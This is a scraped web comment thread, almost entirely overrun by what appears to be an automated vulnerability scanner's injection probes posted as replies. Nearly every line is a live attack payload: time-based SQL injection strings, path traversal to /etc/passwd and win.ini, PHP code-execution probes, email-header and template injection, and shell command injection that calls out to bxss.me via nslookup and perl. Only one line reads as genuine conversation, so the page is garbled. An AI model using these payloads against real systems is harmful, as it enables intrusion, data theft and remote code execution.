unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Leo Saito
WEB-INF/web.xml
re: Leo Saito
WEB-INF\web.xml
re: Leo Saito
1
re: Leo Saito
1
re: Leo Saito
-1 OR 2+620-620-1=0+0+0+1 --
re: Leo Saito
-1 OR 3+620-620-1=0+0+0+1 --
re: Leo Saito
-1 OR 2+27-27-1=0+0+0+1
re: Leo Saito
-1 OR 3+27-27-1=0+0+0+1
re: Leo Saito
-1' OR 2+791-791-1=0+0+0+1 --
re: Leo Saito
-1' OR 3+791-791-1=0+0+0+1 --
re: Leo Saito
-1' OR 2+318-318-1=0+0+0+1 or 'fdv3rDng'='
re: Leo Saito
-1' OR 3+318-318-1=0+0+0+1 or 'fdv3rDng'='
re: Leo Saito
-1" OR 2+494-494-1=0+0+0+1 --
re: Leo Saito
-1" OR 3+494-494-1=0+0+0+1 --
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
DP1IrNTx'; waitfor delay '0:0:15' --
re: Leo Saito
-5 OR 929=(SELECT 929 FROM PG_SLEEP(15))--
re: Leo Saito
-5) OR 790=(SELECT 790 FROM PG_SLEEP(15))--
re: Leo Saito
-1)) OR 318=(SELECT 318 FROM PG_SLEEP(15))--
re: Leo Saito
5PVYbZcx' OR 821=(SELECT 821 FROM PG_SLEEP(15))--
re: Leo Saito
kSIU7qAQ') OR 377=(SELECT 377 FROM PG_SLEEP(15))--
re: Leo Saito
NVot5XhR')) OR 582=(SELECT 582 FROM PG_SLEEP(15))--
re: Leo Saito
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@PEeEn
Thanks all! Will try out the places listed.
re: Yee How
WU8Mrils
re: Yee How
1*
re: Yee How
1*
re: Yee How
1*
re: Yee How
1*
re: Yee How
-1 OR 2+359-359-1=0+0+0+1
re: Yee How
-1 OR 3+359-359-1=0+0+0+1
re: Yee How
if(now()=sysdate(),sleep(15),0)
re: Yee How
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Yee How
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Yee How
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Yee How
-1; waitfor delay '0:0:15' --
re: Yee How
-1); waitfor delay '0:0:15' --
re: Yee How
1 waitfor delay '0:0:15' --
re: Yee How
3pdtxfzm'; waitfor delay '0:0:15' --
re: Yee How
-5 OR 560=(SELECT 560 FROM PG_SLEEP(15))--
re: Yee How
-5) OR 453=(SELECT 453 FROM PG_SLEEP(15))--
re: Yee How
-1)) OR 113=(SELECT 113 FROM PG_SLEEP(15))--
re: Yee How
8twPQgSG' OR 46=(SELECT 46 FROM PG_SLEEP(15))--
re: Yee How
TrbkL8wf') OR 85=(SELECT 85 FROM PG_SLEEP(15))--
re: Yee How
DOmxwffP')) OR 127=(SELECT 127 FROM PG_SLEEP(15))--
re: Yee How
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Yee How
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Yee How
'||(select 1 from (select pg_sleep(15))x)||'
re: Yee How
''||(select 1 from (select pg_sleep(15))x)||''
re: Yee How
1'"
re: Yee How
@@lXSEI
re: Yee How
xZOvynwo
re: Yee How
1*
re: Yee How
1*
re: Yee How
1*
re: Yee How
1*
re: Yee How
-1 OR 2+118-118-1=0+0+0+1
re: Yee How
-1 OR 3+118-118-1=0+0+0+1
re: Yee How
if(now()=sysdate(),sleep(15),0)
re: Yee How
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Yee How
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Yee How
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Yee How
-1; waitfor delay '0:0:15' --
re: Yee How
-1); waitfor delay '0:0:15' --
re: Yee How
1 waitfor delay '0:0:15' --
re: Yee How
e1Vs0SJG'; waitfor delay '0:0:15' --
re: Yee How
-5 OR 235=(SELECT 235 FROM PG_SLEEP(15))--
re: Yee How
-5) OR 762=(SELECT 762 FROM PG_SLEEP(15))--
re: Yee How
-1)) OR 966=(SELECT 966 FROM PG_SLEEP(15))--
re: Yee How
u6yuCxT9' OR 282=(SELECT 282 FROM PG_SLEEP(15))--
re: Yee How
lSfy3UGx') OR 441=(SELECT 441 FROM PG_SLEEP(15))--
re: Yee How
xhQFmbqt')) OR 987=(SELECT 987 FROM PG_SLEEP(15))--
re: Yee How
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Yee How
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Yee How
'||(select 1 from (select pg_sleep(15))x)||'
re: Yee How
''||(select 1 from (select pg_sleep(15))x)||''
re: Yee How
1'"
re: Yee How
@@56Xul
re: Yee How
1dncNvMLO
re: Yee How
%0abcc:074625.67-13194.67.7f50c.19990.2@bxss.me
re: Yee How
response.write(9622512*9266926)
re: Yee How
to@example.com>%0d%0abcc:074625.67-13252.67.7f50c.19990.2@bxss.me
re: Yee How
'+response.write(9622512*9266926)+'
re: Yee How
<esi:include src="http://bxss.me/rpb.png"/>
re: Yee How
"+response.write(9622512*9266926)+"
re: Yee How
${9999855+9999104}
re: Yee How
../../../../../../../../../../../../../../etc/passwd
re: Yee How
../../../../../../../../../../../../../../windows/win.ini
re: Yee How
file:///etc/passwd
re: Yee How
../../../../../../../../../../../../../../../proc/version
re: Yee How
'.gethostbyname(lc('hitdj'.'pitwljwk5a30a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(71).chr(103).chr(75).'
re: Yee How
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Yee How
".gethostbyname(lc("hitae"."zfafrdeo90560.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(81).chr(122).chr(74)."
re: Yee How
)
re: Yee How
../../../../../../../../../../etc/passwd%00.jpg
re: Yee How
!(()&&!|*|*|
re: Yee How
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Yee How
^(#$!@#$)(()))******
re: Yee How
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Yee How
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Yee How
/etc/passwd
re: Yee How
%2fetc%2fpasswd
re: Yee How
echo vpvhuu$()\ xgovju\nz^xyu||a #' &echo vpvhuu$()\ xgovju\nz^xyu||a #|" &echo vpvhuu$()\ xgovju\nz^xyu||a #
re: Yee How
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Yee How
HttP://bxss.me/t/xss.html?%00
re: Yee How
"+"A".concat(70-3).concat(22*4).concat(113).concat(87).concat(116).concat(88)+(require"socket"
Socket.gethostbyname("hittg"+"zazckbhfdef9d.bxss.me.")[3].to_s)+"
re: Yee How
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Yee How
&echo fprlep$()\ ceyhhv\nz^xyu||a #' &echo fprlep$()\ ceyhhv\nz^xyu||a #|" &echo fprlep$()\ ceyhhv\nz^xyu||a #
re: Yee How
bxss.me/t/xss.html?%00
re: Yee How
'+'A'.concat(70-3).concat(22*4).concat(122).concat(66).concat(105).concat(78)+(require'socket'
Socket.gethostbyname('hitli'+'vzxlvima0b3d8.bxss.me.')[3].to_s)+'
re: Yee How
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Yee How
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Yee How
|echo myrnhq$()\ xdvllv\nz^xyu||a #' |echo myrnhq$()\ xdvllv\nz^xyu||a #|" |echo myrnhq$()\ xdvllv\nz^xyu||a #
re: Yee How
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Yee How
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Yee How
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Yee How
(nslookup hitrgwlfawyfi85eb0.bxss.me||perl -e "gethostbyname('hitrgwlfawyfi85eb0.bxss.me')")
re: Yee How
Http://bxss.me/t/fit.txt
re: Yee How
';print(md5(31337));$a='
re: Yee How
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Yee How
$(nslookup hituqpldktbau65bf8.bxss.me||perl -e "gethostbyname('hituqpldktbau65bf8.bxss.me')")
re: Yee How
http://bxss.me/t/fit.txt%3F.jpg
re: Yee How
";print(md5(31337));$a="
re: Yee How
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Yee How
'"
re: Yee How
&nslookup hitnvfzygootp4843f.bxss.me&'\"`0&nslookup hitnvfzygootp4843f.bxss.me&`'
re: Yee How
/etc/shells
re: Yee How
${@print(md5(31337))}
re: Yee How
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Yee How
<!--
re: Yee How
&(nslookup hitqsbghokeux79e1b.bxss.me||perl -e "gethostbyname('hitqsbghokeux79e1b.bxss.me')")&'\"`0&(nslookup hitqsbghokeux79e1b.bxss.me||perl -e "gethostbyname('hitqsbghokeux79e1b.bxss.me')")&`'
re: Yee How
c:/windows/win.ini
re: Yee How
${@print(md5(31337))}\
re: Yee How
file:///etc/passwd
re: Yee How
|(nslookup hitakzlhpkopm51c1d.bxss.me||perl -e "gethostbyname('hitakzlhpkopm51c1d.bxss.me')")
re: Yee How
bxss.me
re: Yee How
'.print(md5(31337)).'
re: Yee How
/\../\../\../\../\../\../\../etc/passwd
re: Yee How
`(nslookup hitxevkzbazhhb8298.bxss.me||perl -e "gethostbyname('hitxevkzbazhhb8298.bxss.me')")`
re: Yee How
/WEB-INF/web.xml
re: Yee How
;(nslookup hitjonqyyjzode3590.bxss.me||perl -e "gethostbyname('hitjonqyyjzode3590.bxss.me')")|(nslookup hitjonqyyjzode3590.bxss.me||perl -e "gethostbyname('hitjonqyyjzode3590.bxss.me')")&(nslookup hitjonqyyjzode3590.bxss.me||perl -e "gethostbyname('hitjonqyyjzode3590.bxss.me')")
re: Yee How
C:\WINDOWS\system32\drivers\etc\hosts
re: Yee How
../../../../../../../../../../windows/win.ini%00.jpg
re: Yee How
/../../../../../../../../../../boot.ini
re: Yee How
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Yee How
..\..\..\..\..\..\..\..\windows\win.ini
re: Yee How
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Yee How
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Yee How
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Yee How
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Yee How
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.